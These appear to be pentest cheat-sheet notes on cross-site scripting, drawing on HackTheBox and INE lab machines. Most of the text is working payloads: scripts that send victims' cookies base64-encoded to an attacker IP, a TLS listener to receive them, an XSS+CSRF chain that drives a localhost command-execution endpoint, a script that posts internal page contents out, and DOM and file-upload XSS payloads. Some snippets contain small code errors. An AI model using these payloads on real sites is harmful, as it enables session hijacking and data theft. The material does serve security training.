Cookie Stealing-
(Note: HttpOnly should not be enabled/present in cookie header)
- Classic way-
<script>var i=new Image(); i.src="http://10.10.14.8/?cookie="+btoa(document.cookie);</script>Here we have used btoa() method for converting the cookie string into base64 encoded string.
python3 -m http.server -m 80
2. Bypassing secure flag protection-
a) Creating a HTTPS server-
openssl req -new -x509 -keyout localhost.pem -out localhost.pem -days 365 -nodesGenerating certificate.
#!/usr/bin/python3
import http.server, sslserver_address = ('0.0.0.0', 443)
httpd = http.server.HTTPServer(server_address, http.server.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,server_side=True,certfile='localhost.pem')
"""ssl_version=ssl.PROTOCOL_TLSv1_2)
"""
httpd.serve_forever()
Starting web server.
2. Via XHR-
var xhr=new XMLHttpRequest();
xhr.open("GET", "https://10.10.14.8/?"+document.cookie, true);
xhr.send();3. Fetch api
Redirecting User to malicious websites-
<script>window.location.replace("http://evil.com");</script>Accessing internal application/Bypassing localhost restrictions-
Suppose Some functionality in web app which can be accessed only from local server. And if xss is getting triggered on serverside when a Administrator user is browsing vulnerable web app while logged in, then it is possible to access this internal functionality by combining XSS+CSRF by using a xhr request.
Scenario 1:
Sample source code:
if($_SERVER['REMOTE_ADDR'] == "::1")
{
system($_POST['cmd']);
} else
{
echo "It's only allowed to access this function from localhost (::1).<br> This is due to the recent hack attempts on our server.";
}XHR request js file-
var http = new XMLHttpRequest();
var url = 'http://127.0.0.1/admin/backdoorchecker.php';
var params = 'orem=dir | ping -n 5 10.10.14.8';
http.open('POST', url, true);
http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
http.withCredentials = true;
http.send(params);
<script src=http://10.10.14.8:80/robme.js></script>Scenerio 2: Stacked.htb
Referer http header is vuln to xss.
Our XSS is being triggered at other application hosted on domain mail.stacked.htb which was not accessible from external network.
So for accessing that we will be using simple javascript as below in our xss payload:
//apni.js
var url="http://mail.stacked.htb/" //targeturl(internal wep application)
var xhr=new XMLHttpRequest();
xhr.open("GET", url, false);
xhr.send();
var resp=xhr.responseText;//transferring HTTP response to us
var xhr2=new XMLHttpRequest();
xhr2.open("POST", 'http://10.10.14.89:443/', false);
xhr2.send(resp);
XSS payload-
<script src="http://10.10.14.89/apni.js"></script>And we start netcat listener for capturing response of our xhr.
We can open this html in browser to view the application.
DOM XSS
INE: WebApp Labs Web Application attacks LAB 30
window.onload = function() {var site=document.location.href;var index = site.indexOf("=", 0);name="";if(index != -1) {name=site.substr(index+1);}name=decodeURIComponent(name);document.getElementById('name').innerHTML=name;}
Payload:
<img src='lol' onerror="alert(1)">XSS via file uploads:
Note: Below Scenario is there in meta htb machine.
exiftool -Comment='<H1>Hello</H1>' Untitled.pngVerified HTML injection.
For XSS we can try the below payload:
<img src=x onerror=alert(document.domain)>
HTML Injection:
<html>
<body>
<script>
function download File(URL, filename)
{
const anchorElement = document.createElement('a');
anchorElement.href = url;
anchorElement.download = filename;
document.body.appendChild(anchorElement);
anchorElement.click();
document.body.removeChild(anchorElement);
}
const fileUrl = '<URL for the file>';
const fileName = '<file name for saving on victim end>';
downloadFile(fileUrl, fileName);
</script>
</body>
</html>